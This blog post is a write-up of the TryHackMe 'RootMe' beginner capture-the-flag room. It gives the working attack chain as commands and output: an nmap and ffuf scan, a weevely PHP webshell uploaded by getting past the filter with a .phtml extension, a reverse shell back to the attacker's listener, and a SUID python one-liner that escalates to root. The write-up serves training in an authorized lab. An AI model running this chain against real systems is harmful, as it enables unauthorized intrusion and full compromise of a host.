---
layout: post
title: "RootMe - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - web
  - php
  - sudo
date: 2021/03/19 20:33:00
thumbnail: /images/TryHackMe/rrootme.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** RootMe
- **Profile:** [tryhackme.com](https://tryhackme.com/room/rrootme)
- **Difficulty:** Easy
- **Description**: A ctf for beginners, can you root me?

![RootMe](/images/TryHackMe/rrootme.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf seclists weevely gtfoblookup
```

## Network enumeration

Service scn with nmap:

```plaintext
# Nmap 7.91 scan initiated Fri Mar 19 11:48:02 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.80.74
Nmap scan report for 10.10.80.74
Host is up (0.085s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 11:50:31 2021 -- 1 IP address (1 host up) scanned in 149.40 seconds
```

## Web enumeration

Let's find hidden directories:

```plaintext
$ ffuf -u http://10.10.156.75/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.156.75/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

uploads                 [Status: 301, Size: 314, Words: 20, Lines: 10]
panel                   [Status: 301, Size: 312, Words: 20, Lines: 10]
css                     [Status: 301, Size: 310, Words: 20, Lines: 10]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
                        [Status: 200, Size: 616, Words: 115, Lines: 26]
```

There is an upload form at `/panel/`.

## Web exploitation

The file `/index.php` let us know that the app is in PHP.

Uploading a `.png` image is allowed but not a php file (`.php`).

Let's generate a webshell:

```plaintext
$ weevely generate noraj agent.php
```

We can bypass the upload by using the `.phtml` extension.

```plaintext
weevely http://10.10.156.75/uploads/agent.phtml noraj

[+] weevely 4.0.1

[+] Target:     10.10.156.75
[+] Session:    /home/noraj/.weevely/sessions/10.10.156.75/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Let's obtain a reverse shell from our web shell:

```plaintext
www-data@rootme:/var/www/html/uploads $ :backdoor_reversetcp 10.9.19.77 9999
```

On my machine:

```plaintext
$ pwncat -lvv 9999
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.156.75:49816 (family 2/IPv4, TCP)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ find / -type f -name user.txt 2>/dev/null
/var/www/user.txt

$ cat /var/www/user.txt
THM{edited}
```

## System enumeration

Let's find SUID binaries:

```plaintext
$ find / -type f -user root -perm -u=s 2>/dev/null
...
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
...
```

`/usr/bin/python` should not have the SUID flag.

We can consult GTFObin:

```plaintext
$ gtfoblookup linux suid python
python:

    suid:

        Code: ./python -c 'import os; os.execl("/bin/sh", "sh",
              "-p")'
```

Let's get our privileged shell:

```plaintext
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

cat /root/root.txt
THM{edited}
```
